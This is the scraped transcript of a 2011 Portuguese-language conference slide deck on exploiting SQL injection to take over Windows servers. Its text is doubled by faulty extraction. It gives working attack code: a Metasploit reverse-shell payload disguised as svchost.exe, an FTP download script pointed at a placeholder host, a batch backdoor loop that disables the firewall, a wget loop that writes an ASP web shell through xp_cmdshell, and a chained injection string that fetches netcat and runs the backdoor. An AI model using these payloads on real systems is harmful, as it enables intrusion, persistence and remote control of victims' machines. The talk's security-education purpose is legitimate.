Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]
-
Upload
vale-security-conference -
Category
Documents
-
view
640 -
download
1
description
Transcript of Vale Security Conference - 2011 - 3 - Rener Alberto (Gr1nch) [DC Labs]
Rêner Alberto / Gr1nch
SQL Injection SQL Injection Pwning a Pwning a
Windows Box!Windows Box!
AGENDAAGENDA Como encontrar a falha?Como encontrar a falha? Explorando a moda antiga.Explorando a moda antiga. Stored Procedures.Stored Procedures. E.B.G: Demo Shell reverso via SQLiE.B.G: Demo Shell reverso via SQLi E.B.G: Demo Upload ASP com SQLiE.B.G: Demo Upload ASP com SQLi Ferramentas para SQLi: Ferramentas para SQLi:
– Demo SQLMAPDemo SQLMAP
– Demo Havij Demo Havij Momento CapivaraMomento Capivara
Como encontrar a falha?Como encontrar a falha? A velha história A velha história dos inputs.dos inputs.
DEMO Google Scans.DEMO Google Scans. Fuzzing.Fuzzing. Demo: Gr1nch ScanDemo: Gr1nch Scan
DEMO GR1nch SQLi ScanDEMO GR1nch SQLi Scan
Hackeando a aplicação web.Hackeando a aplicação web.Demo:Demo:
– ObtendObtendo informações po informações pelos erros.elos erros.
– Enumerando os campos da tabela.Enumerando os campos da tabela.
– Descobrindo o tipo do campo.Descobrindo o tipo do campo.
– Add um user válido.Add um user válido.
– Game Over!Game Over!
Explorando a moda antigaExplorando a moda antiga
Stored ProceduresStored Procedures Funções do SQL Server úteis no SQLi:Funções do SQL Server úteis no SQLi:
1) 1) xp_cmdshell: Execução de comandos MS-DOSxp_cmdshell: Execução de comandos MS-DOS
2) 2) xp_regread: Ler valores do registroxp_regread: Ler valores do registro
3) 3) xp_regwrite: Escrever no registro.xp_regwrite: Escrever no registro.
4) 4) xp_dirtree / xp_subdirs: Listar diretorios.xp_dirtree / xp_subdirs: Listar diretorios.
5) 5) xp_fixeddrives: Exibir os HD's.xp_fixeddrives: Exibir os HD's.
6) 6) sp_makewebtask: DUMP do banco (REMOVIDA!)sp_makewebtask: DUMP do banco (REMOVIDA!)
A técnica do E.B.GA técnica do E.B.G EE= Exploit= Exploit
BB= Baseado= Baseado
GG= Gambiarra= Gambiarra Pequenas variações na forma de atacar Pequenas variações na forma de atacar podempodem significar em um bypass nos significar em um bypass nos sistemas de proteção.sistemas de proteção.
Utilize a criativadade quando for Utilize a criativadade quando for explorar uma falha.explorar uma falha.
Nem todo mundo precisa Nem todo mundo precisa
explorar da mesma forma...explorar da mesma forma...
E.B.G:Shell Windows via SQLiE.B.G:Shell Windows via SQLi
Shell Windows via SQLiShell Windows via SQLiUtilizando o MetaSploit para criar um XPL:
msfpayload windows/shell_reverse_tcp LHOST=192.168.XXX.XXX LPORT=???? X > /FTP/svchost.exe
Arquivo gr1nch.txt: ------------------------------------------------------------- open XXX.XXX.XXX.XXX 21 USER gr1nch p4s$w0rd binary get svchost.exe %temp%\svchost.exe quit
Arquivo d00r.bat:------------------------------------------------------------ cd %temp% ftp -i -n -v -s:%temp%\gr1nch.txt :backd00r netsh firewall set opmode mode = disable svchost.exe goto backd00r
while read linedoSQL_STRING=$(echo -n "$line" | hexdump -v -e '"#" 1/1 "%02X"' | sed -e 's:#:%:g')wget --post-data="username=';exec%20xp_cmdshell%20'echo%20"$SQL_STRING"%20>>%20c:\\inetpub\\wwwroot\\gr1nch.asp'--" http://192.168.2.50/process_login.asp >> /dev/null 2>&1done < gr1nch.asprm process_login.*
Upload CMD.ASP via SQLiUpload CMD.ASP via SQLiE.B.G. Code:E.B.G. Code:
E.B.G DEMO 1E.B.G DEMO 1
Let's Hack!Let's Hack!
E.B.G. Code:E.B.G. Code: Shell Windows via SQLiShell Windows via SQLi
';exec xp_cmdshell 'echo open XXX.XXX.XXX.XXX 21 > %temp%\gr1nch.txt';exec xp_cmdshell 'echo USER d3f4c3r DcLabs@2009 >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo binary >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo get nc.exe %temp%\svchost.exe >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo get xpl.asp %temp%\xpl.asp >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo quit >> %temp%\gr1nch.txt';exec xp_cmdshell 'echo cd %temp% > %temp%\d00r.bat';exec xp_cmdshell 'echo ftp -i -n -v -s:%temp%\gr1nch.txt >> %temp%\d00r.bat';exec xp_cmdshell 'echo :backd00r >> %temp%\d00r.bat';exec xp_cmdshell 'echo netsh firewall set opmode mode = disable >> %temp%\d00r.bat';exec xp_cmdshell 'echo svchost.exe >> %temp%\d00r.bat';exec xp_cmdshell 'echo goto backd00r >> %temp%\d00r.bat';exec xp_cmdshell '%temp%\d00r.bat'-----------------------------------------------------------------------------------------------
Let's Hack!Let's Hack!
E.B.G DEMO 2E.B.G DEMO 2
Ferramentas de SQLiFerramentas de SQLi Ferramentas foram feitas para auxiliar Ferramentas foram feitas para auxiliar seu trabalho não para trabalhar por seu trabalho não para trabalhar por você.você.
Utilizar uma ferramenta de ataque sem Utilizar uma ferramenta de ataque sem conhecimento não faz de você um hacker.conhecimento não faz de você um hacker.
DEMO utilizando o SQLMAPDEMO utilizando o SQLMAP DEMO utilizando o HAVIJDEMO utilizando o HAVIJ
Momento CapivaraMomento Capivara
Dúvidas, Elogios Dúvidas, Elogios ouou
Blasfêmias?Blasfêmias?
Obrigado!Obrigado!Mail: [email protected]: [email protected]: @Gr1nchDCTwitter: @Gr1nchDCIRC: IRC: irc.freenode.net /j #DcLabsirc.freenode.net /j #DcLabs
Site: www.dclabs.com.brSite: www.dclabs.com.br